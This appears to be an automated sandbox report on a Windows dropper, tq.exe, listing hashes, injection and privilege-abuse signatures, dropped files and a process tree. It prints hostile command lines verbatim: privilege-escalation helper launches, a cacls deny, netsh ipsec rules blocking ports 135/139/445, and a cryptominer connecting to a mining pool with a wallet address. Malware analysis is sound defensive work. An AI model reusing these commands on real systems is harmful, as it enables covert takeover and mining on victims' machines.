Analysis
  max time kernel: 124s
  max time network: 138s
  platform: windows10_x64
  resource: win10v20210408
  submitted: 07-05-2021 13:00

  Static task: static1
  Behavioral task: behavioral1 (sample tq.exe, resource win7v20210410)
  Behavioral task: behavioral2 (sample tq.exe, resource win10v20210408)

General
  Target: tq.exe
  Size: 418KB
  MD5: e8450e61f061fd90d74507eb04845ecd
  SHA1: f344f20c57f9cb01ea3166f3404336da1519a832
  SHA256: 0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
  SHA512: d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes:
  description            | pid  | process     | target process
  PID 2120 created 1896  | 2120 | svchost.exe | MS19.exe
Downloads MZ/PE file

Executes dropped EXE (7 IoCs)
Processes:
  pid  | process
  1896 | MS19.exe
  2132 | MS20.exe
  3928 | MSSQLH.exe
  3496 | RunDllExe.exe
  1872 | RunDllExe.exe
  572  | x64.exe
  188  | wudfhosts.exe
Registers new Print Monitor (2 TTPs)

Sets DLL path for service in the registry (2 TTPs)
Processes:
  resource                                   | yara_rule
  C:\Users\Admin\AppData\Local\Temp\x64.exe  | upx
  C:\Users\Admin\AppData\Local\Temp\x64.exe  | upx
  C:\Windows\Cursors\wudfhosts.exe           | upx
  C:\Windows\Cursors\WUDFhosts.exe           | upx
Loads dropped DLL (2 IoCs)
Processes:
  pid process
  2024 2056 svchost.exe
Drops file in System32 directory (6 IoCs)
Processes:
  description                  | ioc                                                                                              | process
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE            | svchost.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies             | svchost.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5     | svchost.exe
  File created                 | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt | svchost.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5   | svchost.exe
Suspicious use of SetThreadContext (1 IoC)
Processes:
  description                          | pid  | process       | target process
  PID 3496 set thread context of 3336  | 3496 | RunDllExe.exe | svchost.exe
Drops file in Windows directory (18 IoCs)
Processes:
  description                  | ioc                                              | process
  File created                 | C:\Windows\Logs\RunDllExe_New.dll                | RunDllExe.exe
  File created                 | C:\Windows\Logs\Vers.txt                         | MSSQLH.exe
  File created                 | C:\Windows\Logs\RunDllExe_New.dll                | RunDllExe.exe
  File opened for modification | C:\Windows\Logs\RunDllExe                        | RunDllExe.exe
  File opened for modification | C:\Windows\Cursors\WUDFhosts.exe                 | x64.exe
  File created                 | C:\Windows\Cursors\WUDFhosts.exe                 | x64.exe
  File created                 | C:\Windows\Logs\RunDllExe.exe                    | MSSQLH.exe
  File created                 | C:\Windows\Logs\RunDllExe_New                    | RunDllExe.exe
  File created                 | C:\Windows\Logs\RunDllExe_New                    | RunDllExe.exe
  File opened for modification | C:\Windows\Logs\RunDllExe.dll                    | RunDllExe.exe
  File created                 | C:\Windows\Help\active_desktop_render_New.dll    | svchost.exe
  File created                 | C:\Windows\Logs\RunDllExe.dll                    | MSSQLH.exe
  File created                 | C:\Windows\MpMgSvc.dll                           | MSSQLH.exe
  File opened for modification | C:\Windows\Logs\RunDllExe                        | RunDllExe.exe
  File created                 | C:\Windows\Help\active_desktop_render.dll        | x64.exe
  File opened for modification | C:\Windows\Help\active_desktop_render.dll        | svchost.exe
  File created                 | C:\Windows\Logs\RunDllExe                        | MSSQLH.exe
  File opened for modification | C:\Windows\Logs\RunDllExe.dll                    | RunDllExe.exe
Modifies data under HKEY_USERS (8 IoCs)
Processes:
  description      | ioc                                                                                                                        | process
  Set value (str)  | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"   | svchost.exe
  Set value (str)  | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"  | svchost.exe
  Key created      | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                                   | svchost.exe
  Set value (int)  | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"                  | svchost.exe
  Set value (int)  | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"                 | svchost.exe
  Set value (int)  | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"                | svchost.exe
  Set value (int)  | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"                   | svchost.exe
  Set value (str)  | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix              | svchost.exe
Suspicious behavior: EnumeratesProcesses (12 IoCs)
Processes:
  pid  | process
  3928 | MSSQLH.exe
  3928 | MSSQLH.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
Suspicious use of AdjustPrivilegeToken (38 IoCs)
Processes:
  description                           | pid  | process
  Token: SeImpersonatePrivilege         | 1896 | MS19.exe
  Token: SeAssignPrimaryTokenPrivilege  | 1896 | MS19.exe
  Token: SeTcbPrivilege                 | 2120 | svchost.exe
  Token: SeTcbPrivilege                 | 2120 | svchost.exe
  Token: SeImpersonatePrivilege         | 2132 | MS20.exe
  Token: SeRestorePrivilege             | 3928 | MSSQLH.exe
  Token: SeBackupPrivilege              | 3928 | MSSQLH.exe
  Token: SeSecurityPrivilege            | 3928 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege       | 3928 | MSSQLH.exe
  Token: SeRestorePrivilege             | 3928 | MSSQLH.exe
  Token: SeBackupPrivilege              | 3928 | MSSQLH.exe
  Token: SeSecurityPrivilege            | 3928 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege       | 3928 | MSSQLH.exe
  Token: SeRestorePrivilege             | 3928 | MSSQLH.exe
  Token: SeBackupPrivilege              | 3928 | MSSQLH.exe
  Token: SeSecurityPrivilege            | 3928 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege       | 3928 | MSSQLH.exe
  Token: SeRestorePrivilege             | 3928 | MSSQLH.exe
  Token: SeBackupPrivilege              | 3928 | MSSQLH.exe
  Token: SeSecurityPrivilege            | 3928 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege       | 3928 | MSSQLH.exe
  Token: SeRestorePrivilege             | 3928 | MSSQLH.exe
  Token: SeBackupPrivilege              | 3928 | MSSQLH.exe
  Token: SeSecurityPrivilege            | 3928 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege       | 3928 | MSSQLH.exe
  Token: SeRestorePrivilege             | 3928 | MSSQLH.exe
  Token: SeBackupPrivilege              | 3928 | MSSQLH.exe
  Token: SeSecurityPrivilege            | 3928 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege       | 3928 | MSSQLH.exe
  Token: SeRestorePrivilege             | 3928 | MSSQLH.exe
  Token: SeBackupPrivilege              | 3928 | MSSQLH.exe
  Token: SeSecurityPrivilege            | 3928 | MSSQLH.exe
  Token: SeTakeOwnershipPrivilege       | 3928 | MSSQLH.exe
  Token: SeRestorePrivilege             | 1156 | svchost.exe
  Token: SeBackupPrivilege              | 1156 | svchost.exe
  Token: SeSecurityPrivilege            | 1156 | svchost.exe
  Token: SeTakeOwnershipPrivilege       | 1156 | svchost.exe
  Token: SeLockMemoryPrivilege          | 188  | wudfhosts.exe
Suspicious use of SetWindowsHookEx (8 IoCs)
Processes:
  pid  | process
  1456 | tq.exe
  3928 | MSSQLH.exe
  3496 | RunDllExe.exe
  1872 | RunDllExe.exe
  572  | x64.exe
  2056 | svchost.exe
  1156 | svchost.exe
  1156 | svchost.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
  description                         | pid  | process       | target process
  PID 1456 wrote to memory of 1896    | 1456 | tq.exe        | MS19.exe
  PID 1456 wrote to memory of 1896    | 1456 | tq.exe        | MS19.exe
  PID 1456 wrote to memory of 2132    | 1456 | tq.exe        | MS20.exe
  PID 1456 wrote to memory of 2132    | 1456 | tq.exe        | MS20.exe
  PID 1456 wrote to memory of 3928    | 1456 | tq.exe        | MSSQLH.exe
  PID 1456 wrote to memory of 3928    | 1456 | tq.exe        | MSSQLH.exe
  PID 1456 wrote to memory of 3928    | 1456 | tq.exe        | MSSQLH.exe
  PID 3928 wrote to memory of 184     | 3928 | MSSQLH.exe    | cacls.exe
  PID 3928 wrote to memory of 184     | 3928 | MSSQLH.exe    | cacls.exe
  PID 3928 wrote to memory of 184     | 3928 | MSSQLH.exe    | cacls.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 1872 wrote to memory of 2916    | 1872 | RunDllExe.exe | svchost.exe
  PID 1872 wrote to memory of 2916    | 1872 | RunDllExe.exe | svchost.exe
  PID 1872 wrote to memory of 2916    | 1872 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3496 wrote to memory of 3336    | 3496 | RunDllExe.exe | svchost.exe
  PID 3928 wrote to memory of 572     | 3928 | MSSQLH.exe    | x64.exe
  PID 3928 wrote to memory of 572     | 3928 | MSSQLH.exe    | x64.exe
  PID 3928 wrote to memory of 572     | 3928 | MSSQLH.exe    | x64.exe
  PID 572 wrote to memory of 2052     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2052     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2052     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 1840     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 1840     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 1840     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 796      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 796      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 796      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3944     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3944     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3944     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2916     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2916     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2916     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3960     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3960     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3960     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 828      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 828      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 828      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 920      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 920      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 920      | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 1548     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 1548     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 1548     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2312     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2312     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 2312     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3176     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3176     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 3176     | 572  | x64.exe       | netsh.exe
  PID 572 wrote to memory of 1896     | 572  | x64.exe       | cmd.exe
  PID 572 wrote to memory of 1896     | 572  | x64.exe       | cmd.exe
  PID 572 wrote to memory of 1896     | 572  | x64.exe       | cmd.exe
  PID 2056 wrote to memory of 1156    | 2056 | svchost.exe   | svchost.exe
  PID 2056 wrote to memory of 1156    | 2056 | svchost.exe   | svchost.exe
  PID 2056 wrote to memory of 1156    | 2056 | svchost.exe   | svchost.exe
Processes
(child processes are indented under their parent; each entry lists the image path, the command line, and the signatures that fired for it)

C:\Users\Admin\AppData\Local\Temp\tq.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\tq.exe"
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\MS19.exe
      command line: C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\MS20.exe
      command line: C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
      command line: C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
      - Executes dropped EXE
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cacls.exe
          command line: cacls C:\Windows\Fonts\*.exe /e /d system

        C:\Users\Admin\AppData\Local\Temp\x64.exe
          command line: x64.exe
          - Executes dropped EXE
          - Drops file in Windows directory
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add policy name=Block

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filterlist name=Filter1

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add filteraction name=FilteraAtion1 action=block

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1

            C:\Windows\SysWOW64\netsh.exe
              command line: netsh ipsec static set policy name=Block assign=y

            C:\Windows\SysWOW64\cmd.exe
              command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"

\??\c:\windows\system32\svchost.exe
  command line: c:\windows\system32\svchost.exe -k netsvcs -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\Logs\RunDllExe.exe
  command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\svchost.exe
      command line: C:\Windows\system32\svchost.exe

C:\Windows\Logs\RunDllExe.exe
  command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\svchost.exe
      command line: C:\Windows\system32\svchost.exe

\??\c:\windows\syswow64\svchost.exe
  command line: c:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\svchost.exe
      command line: C:\Windows\system32\svchost.exe
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx

        C:\Windows\Cursors\wudfhosts.exe
          command line: C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
Downloads